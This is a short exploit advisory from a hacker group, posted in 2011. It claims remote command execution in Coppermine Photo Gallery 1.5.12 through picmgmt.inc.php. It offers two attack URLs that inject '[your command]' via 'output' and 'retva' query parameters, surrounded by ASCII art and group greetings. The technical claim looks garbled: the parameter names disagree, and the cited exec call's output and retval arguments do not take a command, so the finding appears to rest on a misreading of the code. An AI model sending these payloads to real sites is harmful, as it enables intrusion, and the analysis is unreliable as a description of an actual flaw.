Coppermine Photo Gallery version 1.5.x suffers from a remote command execution vulnerability.
4636daec10200eab943f199e537f5d755db8c132485916dc1fee0ff5c8b0cf28
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
+-----------------------------------------------------------------------
-+
| ....... |
| ..''xxxxxxxxxxxxxxx'... |
| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. |
| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. |
| .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. |
| .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. |
| .xxxxxxxxxxxxxxxxxx'... ........ .'. |
| 'xxxxxxxxxxxxxxx'...... '. |
| 'xxxxxxxxxxxxxx'..'x.. .x. |
| .xxxxxxxxxxxx'...'.. ... .' |
| 'xxxxxxxxx'.. . .. .x. |
| xxxxxxx'. .. x. |
| xxxx'. .... x x. |
| 'x'. ...'xxxxxxx'. x .x. |
| .x'. .'xxxxxxxxxxxxxx. '' .' |
| .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' |
| .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. |
| .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' |
| .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. |
| .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. |
| .'xxxxxxx'.... ...xxxxxxx'. |
| ..'xxxxx'.. ..xxxxx'.. |
| ....'xx'.....''''... |
+-----------------------------------------------------------------------
-+
Remote Command Execution Vulnerability
========================================================================
Coppermine Photo Gallery <== (picmgmt.inc.php)
# [+] Author : Sn!pEr.S!Te Hacker #
# [+] Email : sniper-site@HoTMaiL.coM #
# [+] T34M Inj3t0r Hacker #
# [+] 8-2-2011 #
# [+] Script :lmage � Coppermine Photo Gallery #
# [+] Download:http://sourceforge.net/projects/coppermine/files/Coppermine/1.5.x/cpg1.5.12.zip/download #
# Version: [1.5.12] #
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
Exploit : cpg.1.5.12/include/picmgmt.inc.php
http://localhost/cpg.1.5.12/include/picmgmt.inc.php?output= [your command]
http://127.0.0.1/cpg.1.5.12/include/picmgmt.inc.php?retva=[your command]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
exec $cmd \ $output \ $retval
line :368
----------------------------------------------------------------------
Thanks To All : www.Exploit-db.com |www.root-ar.com |
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=========== T34M ============
r0073r,L0rd CruSad3r,SeeMe,Inj3ct0r,Sid3^effects,indoushka,The_Exploited
--------------------------------------------------------------------------------
========all my friend ==========
* PrX Hacker * GaMzAh HaCkeR * Dr.Banned * No-QrQr * DMaR AL-TMiMi |
* Abu SarH * Fox Hacker * Nazi H4x0R * Mr.aBu.Z7Z7 *HaNniBaL KsA |